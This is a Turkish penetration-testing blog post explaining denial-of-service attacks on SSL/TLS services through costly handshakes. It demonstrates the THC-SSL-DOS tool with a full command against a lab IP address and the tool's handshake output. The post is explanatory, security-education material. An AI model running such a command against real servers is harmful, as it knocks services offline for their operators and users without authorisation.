24 Haziran 2016

SSL Servisine Yönelik DOS Saldırıları

Posted by: Adsız 24 Haziran 2016
Önemli bilgiler (örneğin e-posta adresi, kredi kartı bilgileri, TCKN, kullanıcı adı şifre gibi) iletim esnasında kriptolu olarak iletilmelidir. HTTP clear-text protokoldür ve SSL/TLS ile korunarak HTTPS olarak yapılandırılabilir. Kriptografi algoritmaları algoritmanın gücüne göre belirli seviyede koruma sağlayabilir.
Secure Sockets Layer(SSL) protokolü, internet üzerinden güvenli veri iletişimi sağlayan bir protokoldür. Günümüzde en çok online bankacılık işlemlerinde, sosyal ağlarda, mail sunucularında tercih edilmektedir.
Herhangi bir manipülasyona maruz kalmadan kurulmuş normal bir ssl bağlantısı, standart bir http bağlantısından ortalama 15 kat daha fazla işlemci gücüne ihtiyaç duymaktadır. Bu durumun sonucunda ise sunucuya daha fazla iş düşeceği için daha çok kaynağa ihtiyaç duyacaktır. Bu durumdan yola çıkarak geliştirilen THC-SSL-DOS aracı istemci ile sunucu arasında oluşturduğu trafik ile sunucunun ssl isteklerine cevap verebilme performansını ölçmektedir. Cevap veremediği durumda ise servis dışı kalacaktır ve sistem down gözükecektir. Aşağıdaki ekran alıntısında saldırının anatomisine ait bir görsel verilmiştir.

Genel olarak THC-SSL-DOS aracının kullanımı aşağıdaki gibidir.
-l 100 :  Açılmak istenen bağlantı sayısını belirtmektedir.
192.168.10.12 : Hedef IP adresi
443 : SSL Portu
root@osmncht# thc-ssl-dos -l 100 192.168.100.12 443 --accept
  ______________ ___  _________
    \__    ___/   |   \ \_   ___ \
      |    | /    ~    \/    \  \/
      |    | \    Y    /\     \____
      |____|  \___|_  /  \______  /
                    \/          \/
           http://www.thc.org

         Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err
, , , , , , ,

0 yorum:

Yorum Gönder

Her türlü eleştiri,yorum,ekleme ve düzeltmeye yönelik fikirlerinizi paylaşabilirsiniz.Hakaret içeren yorumlar filtrelenmektedir.

Kaydol: Kayıt Yorumları (Atom)

Labels

ağ analizi arp protokolü backdoor Backtrack bilgi toplama broadcast brute force bruteforce centos critical data Database depdep Dhcp dns dns sinkhole DOS/DDOS attack edge security enumerate users enumuration exploit gelistirme failover firewall gaining access GnuPG google for pentest Güvenlik sistemleri atlatma hacking heartbeat hping http Http flood http security Icmp information gathering iptables iptv işletim sistemi John The Ripper js-beautify jsdetox kaba kuvvet saldırıları kablosuz ağlar keep alive LAN security LFI linux linux security MAC mail security malware analysis Metasploit Mitm attack mobil güvenlik MTU netscreen network scanning network sharing nmap obfuscated javascript analizi os detection out of security articles owasp top 10 p0f paylasim tarama PCI Log PCI log gereksinimleri PCI/DSS penetration testing pentest pentesting physcal device poisoning port scanning privilege escalation Programlama programming for security reconnaissance rootkit search engine for pentest security articles security news Security RFC security tools sniffing social engineering Social network security sosyal mühendislik Sql injection sqlmap ssl dos ssl flood SSL interception Syn flood tcp/udp tcpdump thc-ssl-dos tshark tünelleme user security vulnerability exploiting vulnerability research web pentest web security windows windows paylasim windows security wireless pentest wireshark Xss zararlı javascript analizi zararlı yazılım zararlı yazılım engelleme zararlı yazlım analizi

All Posts

Frequently Asked Questions About Linux / UNIX

Yükleniyor...
Makalelerin kötüye kullanım kullanıcının sorumluluğundadır. | networkpentest.net. Blogger tarafından desteklenmektedir.